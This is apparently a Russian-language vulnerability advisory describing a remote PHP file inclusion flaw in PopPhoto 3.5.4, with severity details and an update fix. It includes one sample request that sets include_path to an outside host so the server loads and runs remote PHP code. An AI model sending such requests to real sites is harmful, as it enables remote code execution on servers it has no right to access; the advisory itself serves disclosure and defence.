PHP-инклюдинг в PopPhoto

Дата публикации:
17.05.2006
Дата изменения:
24.03.2009
Всего просмотров:
1684
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PopPhoto 3.x
Уязвимые версии: PopPhoto 3.5.4, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "cfg[popphoto_base_path]" в сценарии resources/includes/popp.config.loader.inc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://[target]/[path]/resources/includes/popp.config.loader.inc.php?
include_path=http://unsecured-systems.com/forum/

URL производителя: pixaria.com/popphoto/

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: PopPhoto - Remote File Inclusion Vuln

или введите имя

CAPTCHA